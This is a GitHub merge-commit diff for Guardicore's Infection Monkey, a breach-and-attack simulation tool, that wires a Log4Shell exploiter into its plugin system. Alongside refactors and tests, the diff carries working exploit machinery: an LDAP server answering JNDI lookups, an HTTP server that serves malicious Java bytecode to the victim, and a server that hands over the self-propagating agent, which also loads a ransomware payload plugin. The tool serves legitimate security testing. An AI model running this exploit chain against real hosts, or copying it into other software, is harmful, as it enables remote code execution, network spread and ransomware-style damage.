Merge pull request #1757 from guardicore/1736-add-log4shell-to-puppet

Add Log4Shell to puppet
This commit is contained in:
Mike Salvatore 2022-03-07 05:52:21 -05:00 committed by GitHub
commit e58d06b91e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
14 changed files with 239 additions and 133 deletions

View File

@ -18,6 +18,7 @@ from infection_monkey.utils.commands import (
get_monkey_commandline_linux, get_monkey_commandline_linux,
get_monkey_commandline_windows, get_monkey_commandline_windows,
) )
from infection_monkey.utils.environment import is_windows_os
if "win32" == sys.platform: if "win32" == sys.platform:
from win32process import DETACHED_PROCESS from win32process import DETACHED_PROCESS
@ -140,7 +141,7 @@ class MonkeyDrops(object):
location=None, location=None,
) )
if OperatingSystem.Windows == SystemInfoCollector.get_os(): if is_windows_os():
monkey_commandline = get_monkey_commandline_windows( monkey_commandline = get_monkey_commandline_windows(
self._config["destination_path"], monkey_options self._config["destination_path"], monkey_options
) )

View File

@ -13,13 +13,9 @@ from infection_monkey.exploit.log4shell_utils import (
from infection_monkey.exploit.tools.helpers import get_monkey_depth from infection_monkey.exploit.tools.helpers import get_monkey_depth
from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.exploit.tools.http_tools import HTTPTools
from infection_monkey.exploit.web_rce import WebRCE from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.i_puppet.i_puppet import ExploiterResultData
from infection_monkey.model import DOWNLOAD_TIMEOUT as AGENT_DOWNLOAD_TIMEOUT from infection_monkey.model import DOWNLOAD_TIMEOUT as AGENT_DOWNLOAD_TIMEOUT
from infection_monkey.model import ( from infection_monkey.model import DROPPER_ARG, LOG4SHELL_LINUX_COMMAND, LOG4SHELL_WINDOWS_COMMAND
DROPPER_ARG,
LOG4SHELL_LINUX_COMMAND,
LOG4SHELL_WINDOWS_COMMAND,
VictimHost,
)
from infection_monkey.network.info import get_free_tcp_port from infection_monkey.network.info import get_free_tcp_port
from infection_monkey.network.tools import get_interface_to_target from infection_monkey.network.tools import get_interface_to_target
from infection_monkey.utils.commands import build_monkey_commandline from infection_monkey.utils.commands import build_monkey_commandline
@ -37,9 +33,24 @@ class Log4ShellExploiter(WebRCE):
5 # Max time agent will wait for the response from victim in SECONDS 5 # Max time agent will wait for the response from victim in SECONDS
) )
def __init__(self, host: VictimHost): def _exploit_host(self) -> ExploiterResultData:
super().__init__(host) self._open_ports = [
int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
]
if not self._open_ports:
logger.info("Could not find any open web ports to exploit")
return self.exploit_result
self._configure_servers()
self._start_servers()
try:
self.exploit(None, None)
return self.exploit_result
finally:
self._stop_servers()
def _configure_servers(self):
self._ldap_port = get_free_tcp_port() self._ldap_port = get_free_tcp_port()
self._class_http_server_ip = get_interface_to_target(self.host.ip_addr) self._class_http_server_ip = get_interface_to_target(self.host.ip_addr)
@ -48,28 +59,15 @@ class Log4ShellExploiter(WebRCE):
self._ldap_server = None self._ldap_server = None
self._exploit_class_http_server = None self._exploit_class_http_server = None
self._agent_http_server_thread = None self._agent_http_server_thread = None
self._open_ports = [
int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
]
def _exploit_host(self):
if not self._open_ports:
logger.info("Could not find any open web ports to exploit")
return False
self._start_servers()
try:
return self.exploit(None, None)
finally:
self._stop_servers()
def _start_servers(self): def _start_servers(self):
dropper_target_path = self.monkey_target_paths[self.host.os["type"]]
# Start http server, to serve agent to victims # Start http server, to serve agent to victims
paths = self.get_monkey_paths() agent_http_path = self._start_agent_http_server(dropper_target_path)
agent_http_path = self._start_agent_http_server(paths)
# Build agent execution command # Build agent execution command
command = self._build_command(paths["dest_path"], agent_http_path) command = self._build_command(dropper_target_path, agent_http_path)
# Start http server to serve malicious java class to victim # Start http server to serve malicious java class to victim
self._start_class_http_server(command) self._start_class_http_server(command)
@ -77,10 +75,10 @@ class Log4ShellExploiter(WebRCE):
# Start ldap server to redirect ldap query to java class server # Start ldap server to redirect ldap query to java class server
self._start_ldap_server() self._start_ldap_server()
def _start_agent_http_server(self, agent_paths: dict) -> str: def _start_agent_http_server(self, dropper_target_path) -> str:
# Create server for http download and wait for it's startup. # Create server for http download and wait for it's startup.
http_path, http_thread = HTTPTools.try_create_locked_transfer( http_path, http_thread = HTTPTools.try_create_locked_transfer(
self.host, agent_paths["src_path"] self.host, dropper_target_path, self.agent_repository
) )
self._agent_http_server_thread = http_thread self._agent_http_server_thread = http_thread
return http_path return http_path
@ -116,9 +114,7 @@ class Log4ShellExploiter(WebRCE):
def _build_command(self, path, http_path) -> str: def _build_command(self, path, http_path) -> str:
# Build command to execute # Build command to execute
monkey_cmd = build_monkey_commandline( monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, location=path)
self.host, get_monkey_depth() - 1, vulnerable_port=None, location=path
)
if "linux" in self.host.os["type"]: if "linux" in self.host.os["type"]:
base_command = LOG4SHELL_LINUX_COMMAND base_command = LOG4SHELL_LINUX_COMMAND
else: else:
@ -137,11 +133,15 @@ class Log4ShellExploiter(WebRCE):
else: else:
return build_exploit_bytecode(exploit_command, WINDOWS_EXPLOIT_TEMPLATE_PATH) return build_exploit_bytecode(exploit_command, WINDOWS_EXPLOIT_TEMPLATE_PATH)
def exploit(self, url, command) -> bool: def exploit(self, url, command) -> None:
# Try to exploit all services, # Try to exploit all services,
# because we don't know which services are running and on which ports # because we don't know which services are running and on which ports
for exploit in get_log4shell_service_exploiters(): for exploit in get_log4shell_service_exploiters():
for port in self._open_ports: for port in self._open_ports:
logger.debug(
f'Attempting Log4Shell exploit on for service "{exploit.service_name}"'
f"on port {port}"
)
try: try:
url = exploit.trigger_exploit(self._build_ldap_payload(), self.host, port) url = exploit.trigger_exploit(self._build_ldap_payload(), self.host, port)
except Exception as ex: except Exception as ex:
@ -156,11 +156,12 @@ class Log4ShellExploiter(WebRCE):
"port": port, "port": port,
} }
self.exploit_info["vulnerable_urls"].append(url) self.exploit_info["vulnerable_urls"].append(url)
return True self.exploit_result.exploitation_success = True
self.exploit_result.propagation_success = True
return False
def _wait_for_victim(self) -> bool: def _wait_for_victim(self) -> bool:
# TODO: Peridodically check to see if ldap or HTTP servers have exited with an error. If
# they have, return with an error.
victim_called_back = False victim_called_back = False
victim_called_back = self._wait_for_victim_to_download_java_bytecode() victim_called_back = self._wait_for_victim_to_download_java_bytecode()
@ -180,6 +181,7 @@ class Log4ShellExploiter(WebRCE):
time.sleep(1) time.sleep(1)
logger.debug("Timed out while waiting for victim to download the java bytecode")
return False return False
def _wait_for_victim_to_download_agent(self): def _wait_for_victim_to_download_agent(self):

View File

@ -1,46 +1,13 @@
import http.server import http.server
import logging import logging
import threading import threading
from typing import Type
logger = logging.getLogger(__name__) logger = logging.getLogger(__name__)
HTTP_TOO_MANY_REQUESTS_ERROR_CODE = 429 HTTP_TOO_MANY_REQUESTS_ERROR_CODE = 429
# If we need to run multiple HTTP servers in parallel, we'll need to either:
# 1. Use multiprocessing so that each HTTPHandler class has its own class_downloaded variable
# 2. Create a metaclass and define the handler class dymanically at runtime
class HTTPHandler(http.server.BaseHTTPRequestHandler):
java_class: bytes
class_downloaded: threading.Event
download_lock: threading.Lock
@classmethod
def initialize(cls, java_class: bytes, class_downloaded: threading.Event):
cls.java_class = java_class
cls.class_downloaded = class_downloaded
cls.download_lock = threading.Lock()
def do_GET(self):
with HTTPHandler.download_lock:
if HTTPHandler.class_downloaded.is_set():
self.send_error(
HTTP_TOO_MANY_REQUESTS_ERROR_CODE,
"Java exploit class has already been downloaded",
)
return
HTTPHandler.class_downloaded.set()
logger.info("Java class server received a GET request!")
self.send_response(200)
self.send_header("Content-type", "application/octet-stream")
self.end_headers()
logger.info("Sending the payload class!")
self.wfile.write(self.java_class)
class ExploitClassHTTPServer: class ExploitClassHTTPServer:
""" """
An HTTP server that serves Java bytecode for use with the Log4Shell exploiter. This server An HTTP server that serves Java bytecode for use with the Log4Shell exploiter. This server
@ -62,7 +29,7 @@ class ExploitClassHTTPServer:
self._class_downloaded = threading.Event() self._class_downloaded = threading.Event()
self._poll_interval = poll_interval self._poll_interval = poll_interval
HTTPHandler.initialize(java_class, self._class_downloaded) HTTPHandler = _get_new_http_handler_class(java_class, self._class_downloaded)
self._server = http.server.HTTPServer((ip, port), HTTPHandler) self._server = http.server.HTTPServer((ip, port), HTTPHandler)
# Setting `daemon=True` to save ourselves some trouble when this is merged to the # Setting `daemon=True` to save ourselves some trouble when this is merged to the
@ -116,3 +83,46 @@ class ExploitClassHTTPServer:
:rtype: bool :rtype: bool
""" """
return self._class_downloaded.is_set() return self._class_downloaded.is_set()
def _get_new_http_handler_class(
java_class: bytes, class_downloaded: threading.Event
) -> Type[http.server.BaseHTTPRequestHandler]:
"""
Dynamically create a new subclass of http.server.BaseHTTPRequestHandler and return it to the
caller.
Because Python's http.server.HTTPServer accepts a class and creates a new object to
handle each request it receives, any state that needs to be shared between requests must be
stored as class variables. Creating the request handler classes dynamically at runtime allows
multiple ExploitClassHTTPServers, each with it's own unique state, to run concurrently.
"""
def do_GET(self):
with self.download_lock:
if self.class_downloaded.is_set():
self.send_error(
HTTP_TOO_MANY_REQUESTS_ERROR_CODE,
"Java exploit class has already been downloaded",
)
return
self.class_downloaded.set()
logger.info("Java class server received a GET request!")
self.send_response(200)
self.send_header("Content-type", "application/octet-stream")
self.end_headers()
logger.info("Sending the payload class!")
self.wfile.write(self.java_class)
return type(
"HTTPHandler",
(http.server.BaseHTTPRequestHandler,),
{
"java_class": java_class,
"class_downloaded": class_downloaded,
"download_lock": threading.Lock(),
"do_GET": do_GET,
},
)

View File

@ -6,14 +6,16 @@ import threading
import time import time
from pathlib import Path from pathlib import Path
from ldaptor.interfaces import IConnectedLDAPEntry
from ldaptor.ldiftree import LDIFTreeEntry
from ldaptor.protocols.ldap.ldapserver import LDAPServer from ldaptor.protocols.ldap.ldapserver import LDAPServer
from twisted.application import service
from twisted.internet import reactor
from twisted.internet.protocol import ServerFactory from twisted.internet.protocol import ServerFactory
from twisted.python import log
from twisted.python.components import registerAdapter # WARNING: It was observed that this LDAP server would raise an exception and fail to start if
# multiple Python threads attempt to start multiple LDAP servers simultaneously. It was
# thought that since each LDAP server is started in its own process, there would be no
# issue, however this is not the case. It seems that there may be something that is not
# thread- or multiprocess-safe about some of the twisted imports. Moving the twisted
# imports down into the functions where they are required and removing them from the top of
# this file appears to resolve the issue.
logger = logging.getLogger(__name__) logger = logging.getLogger(__name__)
@ -32,6 +34,8 @@ class Tree:
""" """
def __init__(self, http_server_ip: str, http_server_port: int, storage_dir: Path): def __init__(self, http_server_ip: str, http_server_port: int, storage_dir: Path):
from ldaptor.ldiftree import LDIFTreeEntry
self.path = tempfile.mkdtemp(prefix="log4shell", suffix=".ldap", dir=storage_dir) self.path = tempfile.mkdtemp(prefix="log4shell", suffix=".ldap", dir=storage_dir)
self.db = LDIFTreeEntry(self.path) self.db = LDIFTreeEntry(self.path)
@ -91,14 +95,7 @@ class LDAPExploitServer:
self._http_server_ip = http_server_ip self._http_server_ip = http_server_ip
self._http_server_port = http_server_port self._http_server_port = http_server_port
self._storage_dir = storage_dir self._storage_dir = storage_dir
self._server_process = None
# A Twisted reactor can only be started and stopped once. It cannot be restarted after it
# has been stopped. To work around this, the reactor is configured and run in a separate
# process. This allows us to run multiple LDAP servers sequentially or simultaneously and
# stop each one when we're done with it.
self._server_process = multiprocessing.Process(
target=self._run_twisted_reactor, daemon=True
)
def run(self): def run(self):
""" """
@ -108,6 +105,15 @@ class LDAPExploitServer:
:raises LDAPServerStartError: Indicates there was a problem starting the LDAP server. :raises LDAPServerStartError: Indicates there was a problem starting the LDAP server.
""" """
logger.info("Starting LDAP exploit server") logger.info("Starting LDAP exploit server")
# A Twisted reactor can only be started and stopped once. It cannot be restarted after it
# has been stopped. To work around this, the reactor is configured and run in a separate
# process. This allows us to run multiple LDAP servers sequentially or simultaneously and
# stop each one when we're done with it.
self._server_process = multiprocessing.Process(
target=self._run_twisted_reactor, daemon=True
)
self._server_process.start() self._server_process.start()
reactor_running = self._reactor_startup_completed.wait(REACTOR_START_TIMEOUT_SEC) reactor_running = self._reactor_startup_completed.wait(REACTOR_START_TIMEOUT_SEC)
@ -117,6 +123,8 @@ class LDAPExploitServer:
logger.debug("The LDAP exploit server has successfully started") logger.debug("The LDAP exploit server has successfully started")
def _run_twisted_reactor(self): def _run_twisted_reactor(self):
from twisted.internet import reactor
logger.debug(f"Starting log4shell LDAP server on port {self._ldap_server_port}") logger.debug(f"Starting log4shell LDAP server on port {self._ldap_server_port}")
self._configure_twisted_reactor() self._configure_twisted_reactor()
@ -128,6 +136,8 @@ class LDAPExploitServer:
reactor.run() reactor.run()
def _check_if_reactor_startup_completed(self): def _check_if_reactor_startup_completed(self):
from twisted.internet import reactor
check_interval_sec = 0.25 check_interval_sec = 0.25
num_checks = math.ceil(REACTOR_START_TIMEOUT_SEC / check_interval_sec) num_checks = math.ceil(REACTOR_START_TIMEOUT_SEC / check_interval_sec)
@ -141,6 +151,11 @@ class LDAPExploitServer:
time.sleep(check_interval_sec) time.sleep(check_interval_sec)
def _configure_twisted_reactor(self): def _configure_twisted_reactor(self):
from ldaptor.interfaces import IConnectedLDAPEntry
from twisted.application import service
from twisted.internet import reactor
from twisted.python.components import registerAdapter
LDAPExploitServer._output_twisted_logs_to_python_logger() LDAPExploitServer._output_twisted_logs_to_python_logger()
registerAdapter(lambda x: x.root, LDAPServerFactory, IConnectedLDAPEntry) registerAdapter(lambda x: x.root, LDAPServerFactory, IConnectedLDAPEntry)
@ -155,6 +170,8 @@ class LDAPExploitServer:
@staticmethod @staticmethod
def _output_twisted_logs_to_python_logger(): def _output_twisted_logs_to_python_logger():
from twisted.python import log
# Configures Twisted to output its logs using the standard python logging module instead of # Configures Twisted to output its logs using the standard python logging module instead of
# the Twisted logging module. # the Twisted logging module.
# https://twistedmatrix.com/documents/current/api/twisted.python.log.PythonLoggingObserver.html # https://twistedmatrix.com/documents/current/api/twisted.python.log.PythonLoggingObserver.html

View File

@ -116,7 +116,7 @@ class WebRCE(HostExploiter):
if not self.monkey_target_paths: if not self.monkey_target_paths:
self.monkey_target_paths = { self.monkey_target_paths = {
"linux": self.options["dropper_target_path_linux"], "linux": self.options["dropper_target_path_linux"],
"win64": self.options["dropper_target_path_win_64"], "windows": self.options["dropper_target_path_win_64"],
} }
self.HTTP = [str(port) for port in self.options["http_ports"]] self.HTTP = [str(port) for port in self.options["http_ports"]]
super().pre_exploit() super().pre_exploit()

View File

@ -90,6 +90,10 @@ class AutomatedMaster(IMaster):
logger.warning("Forcefully killing the simulation") logger.warning("Forcefully killing the simulation")
def _wait_for_master_stop_condition(self): def _wait_for_master_stop_condition(self):
logger.debug(
"Checking for the stop signal from the island every "
f"{CHECK_ISLAND_FOR_STOP_COMMAND_INTERVAL_SEC} seconds."
)
timer = Timer() timer = Timer()
timer.set(CHECK_ISLAND_FOR_STOP_COMMAND_INTERVAL_SEC) timer.set(CHECK_ISLAND_FOR_STOP_COMMAND_INTERVAL_SEC)

View File

@ -17,6 +17,7 @@ from infection_monkey.credential_collectors import (
) )
from infection_monkey.exploit import CachingAgentRepository, ExploiterWrapper from infection_monkey.exploit import CachingAgentRepository, ExploiterWrapper
from infection_monkey.exploit.hadoop import HadoopExploiter from infection_monkey.exploit.hadoop import HadoopExploiter
from infection_monkey.exploit.log4shell import Log4ShellExploiter
from infection_monkey.exploit.sshexec import SSHExploiter from infection_monkey.exploit.sshexec import SSHExploiter
from infection_monkey.i_puppet import IPuppet, PluginType from infection_monkey.i_puppet import IPuppet, PluginType
from infection_monkey.master import AutomatedMaster from infection_monkey.master import AutomatedMaster
@ -45,11 +46,16 @@ from infection_monkey.telemetry.state_telem import StateTelem
from infection_monkey.telemetry.tunnel_telem import TunnelTelem from infection_monkey.telemetry.tunnel_telem import TunnelTelem
from infection_monkey.utils.aws_environment_check import run_aws_environment_check from infection_monkey.utils.aws_environment_check import run_aws_environment_check
from infection_monkey.utils.environment import is_windows_os from infection_monkey.utils.environment import is_windows_os
from infection_monkey.utils.monkey_dir import get_monkey_dir_path, remove_monkey_dir from infection_monkey.utils.monkey_dir import (
create_monkey_dir,
get_monkey_dir_path,
remove_monkey_dir,
)
from infection_monkey.utils.monkey_log_path import get_monkey_log_path from infection_monkey.utils.monkey_log_path import get_monkey_log_path
from infection_monkey.utils.signal_handler import register_signal_handlers, reset_signal_handlers from infection_monkey.utils.signal_handler import register_signal_handlers, reset_signal_handlers
logger = logging.getLogger(__name__) logger = logging.getLogger(__name__)
logging.getLogger("urllib3").setLevel(logging.INFO)
class InfectionMonkey: class InfectionMonkey:
@ -146,6 +152,8 @@ class InfectionMonkey:
def _setup(self): def _setup(self):
logger.debug("Starting the setup phase.") logger.debug("Starting the setup phase.")
create_monkey_dir()
if firewall.is_enabled(): if firewall.is_enabled():
firewall.add_firewall_rule() firewall.add_firewall_rule()
@ -219,6 +227,9 @@ class InfectionMonkey:
puppet.load_plugin( puppet.load_plugin(
"HadoopExploiter", exploit_wrapper.wrap(HadoopExploiter), PluginType.EXPLOITER "HadoopExploiter", exploit_wrapper.wrap(HadoopExploiter), PluginType.EXPLOITER
) )
puppet.load_plugin(
"Log4ShellExploiter", exploit_wrapper.wrap(Log4ShellExploiter), PluginType.EXPLOITER
)
puppet.load_plugin("ransomware", RansomwarePayload(), PluginType.PAYLOAD) puppet.load_plugin("ransomware", RansomwarePayload(), PluginType.PAYLOAD)

View File

@ -1,8 +1,8 @@
import logging import logging
from contextlib import closing from contextlib import closing
from typing import Dict, Iterable, Optional, Set, Tuple from typing import Dict, Iterable, Optional, Set, Tuple, Any
from requests import head from requests import head, Response
from requests.exceptions import ConnectionError, Timeout from requests.exceptions import ConnectionError, Timeout
from infection_monkey.i_puppet import ( from infection_monkey.i_puppet import (
@ -55,22 +55,27 @@ def _query_potential_http_server(host: str, port: int) -> Tuple[Optional[str], O
https = f"https://{host}:{port}" https = f"https://{host}:{port}"
for url, ssl in ((https, True), (http, False)): # start with https and downgrade for url, ssl in ((https, True), (http, False)): # start with https and downgrade
server_header_contents = _get_server_from_headers(url) server_header = _get_server_from_headers(url)
if server_header_contents is not None: if server_header is not None:
return (server_header_contents, ssl) return server_header, ssl
return (None, None) return None, None
def _get_server_from_headers(url: str) -> Optional[str]: def _get_server_from_headers(url: str) -> Optional[str]:
headers = _get_http_headers(url)
if headers:
return headers.get("Server", "")
return None
def _get_http_headers(url: str) -> Optional[Dict[str, Any]]:
try: try:
logger.debug(f"Sending request for headers to {url}") logger.debug(f"Sending request for headers to {url}")
with closing(head(url, verify=False, timeout=1)) as req: # noqa: DUO123 with closing(head(url, verify=False, timeout=1)) as response: # noqa: DUO123
server = req.headers.get("Server") return response.headers
logger.debug(f'Got server string "{server}" from {url}')
return server
except Timeout: except Timeout:
logger.debug(f"Timeout while requesting headers from {url}") logger.debug(f"Timeout while requesting headers from {url}")
except ConnectionError: # Someone doesn't like us except ConnectionError: # Someone doesn't like us

View File

@ -13,5 +13,5 @@ class T1107Telem(AttackTelem):
def get_data(self): def get_data(self):
data = super(T1107Telem, self).get_data() data = super(T1107Telem, self).get_data()
data.update({"path": self.path}) data.update({"path": str(self.path)})
return data return data

View File

@ -1,19 +1,24 @@
import os
import shutil import shutil
import tempfile import tempfile
from pathlib import Path
MONKEY_DIR_NAME = "monkey_dir" MONKEY_DIR_PREFIX = "monkey_dir_"
_monkey_dir = None
def create_monkey_dir(): # TODO: Check if we even need this. Individual plugins can just use tempfile.mkdtemp() or
# tempfile.mkftemp() if they need to.
def create_monkey_dir() -> Path:
""" """
Creates directory for monkey and related files Creates directory for monkey and related files
""" """
if not os.path.exists(get_monkey_dir_path()): global _monkey_dir
os.mkdir(get_monkey_dir_path())
_monkey_dir = Path(tempfile.mkdtemp(prefix=MONKEY_DIR_PREFIX, dir=tempfile.gettempdir()))
return _monkey_dir
def remove_monkey_dir(): def remove_monkey_dir() -> bool:
""" """
Removes monkey's root directory Removes monkey's root directory
:return True if removed without errors and False otherwise :return True if removed without errors and False otherwise
@ -25,5 +30,8 @@ def remove_monkey_dir():
return False return False
def get_monkey_dir_path(): def get_monkey_dir_path() -> Path:
return os.path.join(tempfile.gettempdir(), MONKEY_DIR_NAME) if _monkey_dir is None:
create_monkey_dir()
return _monkey_dir # type: ignore

View File

@ -51,7 +51,9 @@ class MonkeyDownload(flask_restful.Resource):
def get_agent_executable_path(host_os: str) -> Path: def get_agent_executable_path(host_os: str) -> Path:
try: try:
agent_path = get_executable_full_path(AGENTS[host_os]) agent_path = get_executable_full_path(AGENTS[host_os])
logger.debug(f"Monkey exec found for os: {host_os}, {agent_path}") logger.debug(f'Local path for {host_os} executable is "{agent_path}"')
if not agent_path.is_file():
logger.error(f"File {agent_path} not found")
return agent_path return agent_path
except KeyError: except KeyError:

View File

@ -30,6 +30,16 @@ def server(ip, port, java_class):
server.stop() server.stop()
@pytest.fixture
def second_server(ip, java_class):
server = ExploitClassHTTPServer(ip, get_free_tcp_port(), java_class, 0.01)
server.run()
yield server
server.stop()
@pytest.fixture @pytest.fixture
def exploit_url(ip, port): def exploit_url(ip, port):
return f"http://{ip}:{port}/Exploit" return f"http://{ip}:{port}/Exploit"
@ -46,9 +56,19 @@ def test_only_single_download_allowed(exploit_url, java_class):
assert response_2.content != java_class assert response_2.content != java_class
def test_exploit_class_downloded(server, exploit_url): def test_exploit_class_downloaded(server, exploit_url):
assert not server.exploit_class_downloaded() assert not server.exploit_class_downloaded()
requests.get(exploit_url) requests.get(exploit_url)
assert server.exploit_class_downloaded() assert server.exploit_class_downloaded()
def test_thread_safety(server, second_server, exploit_url):
assert not server.exploit_class_downloaded()
assert not second_server.exploit_class_downloaded()
requests.get(exploit_url)
assert server.exploit_class_downloaded()
assert not second_server.exploit_class_downloaded()

View File

@ -5,27 +5,29 @@ import pytest
from infection_monkey.i_puppet import PortScanData, PortStatus from infection_monkey.i_puppet import PortScanData, PortStatus
from infection_monkey.network_scanning.http_fingerprinter import HTTPFingerprinter from infection_monkey.network_scanning.http_fingerprinter import HTTPFingerprinter
OPTIONS = {"http_ports": [80, 443, 8080, 9200]} OPTIONS = {"http_ports": [80, 443, 1080, 8080, 9200]}
PYTHON_SERVER_HEADER = "SimpleHTTP/0.6 Python/3.6.9" PYTHON_SERVER_HEADER = {"Server": "SimpleHTTP/0.6 Python/3.6.9"}
APACHE_SERVER_HEADER = "Apache/Server/Header" APACHE_SERVER_HEADER = {"Server": "Apache/Server/Header"}
NO_SERVER_HEADER = {"Not_Server": "No Header for you"}
SERVER_HEADERS = { SERVER_HEADERS = {
"https://127.0.0.1:443": PYTHON_SERVER_HEADER, "https://127.0.0.1:443": PYTHON_SERVER_HEADER,
"http://127.0.0.1:8080": APACHE_SERVER_HEADER, "http://127.0.0.1:8080": APACHE_SERVER_HEADER,
"http://127.0.0.1:1080": NO_SERVER_HEADER,
} }
@pytest.fixture @pytest.fixture
def mock_get_server_from_headers(): def mock_get_http_headers():
return MagicMock(side_effect=lambda port: SERVER_HEADERS.get(port, None)) return MagicMock(side_effect=lambda url: SERVER_HEADERS.get(url, None))
@pytest.fixture(autouse=True) @pytest.fixture(autouse=True)
def patch_get_server_from_headers(monkeypatch, mock_get_server_from_headers): def patch_get_http_headers(monkeypatch, mock_get_http_headers):
monkeypatch.setattr( monkeypatch.setattr(
"infection_monkey.network_scanning.http_fingerprinter._get_server_from_headers", "infection_monkey.network_scanning.http_fingerprinter._get_http_headers",
mock_get_server_from_headers, mock_get_http_headers,
) )
@ -34,7 +36,7 @@ def http_fingerprinter():
return HTTPFingerprinter() return HTTPFingerprinter()
def test_no_http_ports_open(mock_get_server_from_headers, http_fingerprinter): def test_no_http_ports_open(mock_get_http_headers, http_fingerprinter):
port_scan_data = { port_scan_data = {
80: PortScanData(80, PortStatus.CLOSED, "", "tcp-80"), 80: PortScanData(80, PortStatus.CLOSED, "", "tcp-80"),
123: PortScanData(123, PortStatus.OPEN, "", "tcp-123"), 123: PortScanData(123, PortStatus.OPEN, "", "tcp-123"),
@ -43,10 +45,10 @@ def test_no_http_ports_open(mock_get_server_from_headers, http_fingerprinter):
} }
http_fingerprinter.get_host_fingerprint("127.0.0.1", None, port_scan_data, OPTIONS) http_fingerprinter.get_host_fingerprint("127.0.0.1", None, port_scan_data, OPTIONS)
assert not mock_get_server_from_headers.called assert not mock_get_http_headers.called
def test_fingerprint_only_port_443(mock_get_server_from_headers, http_fingerprinter): def test_fingerprint_only_port_443(mock_get_http_headers, http_fingerprinter):
port_scan_data = { port_scan_data = {
80: PortScanData(80, PortStatus.CLOSED, "", "tcp-80"), 80: PortScanData(80, PortStatus.CLOSED, "", "tcp-80"),
123: PortScanData(123, PortStatus.OPEN, "", "tcp-123"), 123: PortScanData(123, PortStatus.OPEN, "", "tcp-123"),
@ -57,18 +59,18 @@ def test_fingerprint_only_port_443(mock_get_server_from_headers, http_fingerprin
"127.0.0.1", None, port_scan_data, OPTIONS "127.0.0.1", None, port_scan_data, OPTIONS
) )
assert mock_get_server_from_headers.call_count == 1 assert mock_get_http_headers.call_count == 1
mock_get_server_from_headers.assert_called_with("https://127.0.0.1:443") mock_get_http_headers.assert_called_with("https://127.0.0.1:443")
assert fingerprint_data.os_type is None assert fingerprint_data.os_type is None
assert fingerprint_data.os_version is None assert fingerprint_data.os_version is None
assert len(fingerprint_data.services.keys()) == 1 assert len(fingerprint_data.services.keys()) == 1
assert fingerprint_data.services["tcp-443"]["data"][0] == PYTHON_SERVER_HEADER assert fingerprint_data.services["tcp-443"]["data"][0] == PYTHON_SERVER_HEADER["Server"]
assert fingerprint_data.services["tcp-443"]["data"][1] is True assert fingerprint_data.services["tcp-443"]["data"][1] is True
def test_open_port_no_http_server(mock_get_server_from_headers, http_fingerprinter): def test_open_port_no_http_server(mock_get_http_headers, http_fingerprinter):
port_scan_data = { port_scan_data = {
80: PortScanData(80, PortStatus.CLOSED, "", "tcp-80"), 80: PortScanData(80, PortStatus.CLOSED, "", "tcp-80"),
123: PortScanData(123, PortStatus.OPEN, "", "tcp-123"), 123: PortScanData(123, PortStatus.OPEN, "", "tcp-123"),
@ -79,16 +81,16 @@ def test_open_port_no_http_server(mock_get_server_from_headers, http_fingerprint
"127.0.0.1", None, port_scan_data, OPTIONS "127.0.0.1", None, port_scan_data, OPTIONS
) )
assert mock_get_server_from_headers.call_count == 2 assert mock_get_http_headers.call_count == 2
mock_get_server_from_headers.assert_any_call("https://127.0.0.1:9200") mock_get_http_headers.assert_any_call("https://127.0.0.1:9200")
mock_get_server_from_headers.assert_any_call("http://127.0.0.1:9200") mock_get_http_headers.assert_any_call("http://127.0.0.1:9200")
assert fingerprint_data.os_type is None assert fingerprint_data.os_type is None
assert fingerprint_data.os_version is None assert fingerprint_data.os_version is None
assert len(fingerprint_data.services.keys()) == 0 assert len(fingerprint_data.services.keys()) == 0
def test_multiple_open_ports(mock_get_server_from_headers, http_fingerprinter): def test_multiple_open_ports(mock_get_http_headers, http_fingerprinter):
port_scan_data = { port_scan_data = {
80: PortScanData(80, PortStatus.CLOSED, "", "tcp-80"), 80: PortScanData(80, PortStatus.CLOSED, "", "tcp-80"),
443: PortScanData(443, PortStatus.OPEN, "", "tcp-443"), 443: PortScanData(443, PortStatus.OPEN, "", "tcp-443"),
@ -98,16 +100,34 @@ def test_multiple_open_ports(mock_get_server_from_headers, http_fingerprinter):
"127.0.0.1", None, port_scan_data, OPTIONS "127.0.0.1", None, port_scan_data, OPTIONS
) )
assert mock_get_server_from_headers.call_count == 3 assert mock_get_http_headers.call_count == 3
mock_get_server_from_headers.assert_any_call("https://127.0.0.1:443") mock_get_http_headers.assert_any_call("https://127.0.0.1:443")
mock_get_server_from_headers.assert_any_call("https://127.0.0.1:8080") mock_get_http_headers.assert_any_call("https://127.0.0.1:8080")
mock_get_server_from_headers.assert_any_call("http://127.0.0.1:8080") mock_get_http_headers.assert_any_call("http://127.0.0.1:8080")
assert fingerprint_data.os_type is None assert fingerprint_data.os_type is None
assert fingerprint_data.os_version is None assert fingerprint_data.os_version is None
assert len(fingerprint_data.services.keys()) == 2 assert len(fingerprint_data.services.keys()) == 2
assert fingerprint_data.services["tcp-443"]["data"][0] == PYTHON_SERVER_HEADER assert fingerprint_data.services["tcp-443"]["data"][0] == PYTHON_SERVER_HEADER["Server"]
assert fingerprint_data.services["tcp-443"]["data"][1] is True assert fingerprint_data.services["tcp-443"]["data"][1] is True
assert fingerprint_data.services["tcp-8080"]["data"][0] == APACHE_SERVER_HEADER assert fingerprint_data.services["tcp-8080"]["data"][0] == APACHE_SERVER_HEADER["Server"]
assert fingerprint_data.services["tcp-8080"]["data"][1] is False assert fingerprint_data.services["tcp-8080"]["data"][1] is False
def test_server_missing_from_http_headers(mock_get_http_headers, http_fingerprinter):
port_scan_data = {
1080: PortScanData(1080, PortStatus.OPEN, "", "tcp-1080"),
}
fingerprint_data = http_fingerprinter.get_host_fingerprint(
"127.0.0.1", None, port_scan_data, OPTIONS
)
assert mock_get_http_headers.call_count == 2
assert fingerprint_data.os_type is None
assert fingerprint_data.os_version is None
assert len(fingerprint_data.services.keys()) == 1
assert fingerprint_data.services["tcp-1080"]["data"][0] == ""
assert fingerprint_data.services["tcp-1080"]["data"][1] is False

View File

@ -1,4 +1,5 @@
import json import json
from pathlib import Path
import pytest import pytest
@ -20,3 +21,8 @@ def test_T1107_send(T1107_telem_test_instance, spy_send_telemetry):
expected_data = json.dumps(expected_data, cls=T1107_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=T1107_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
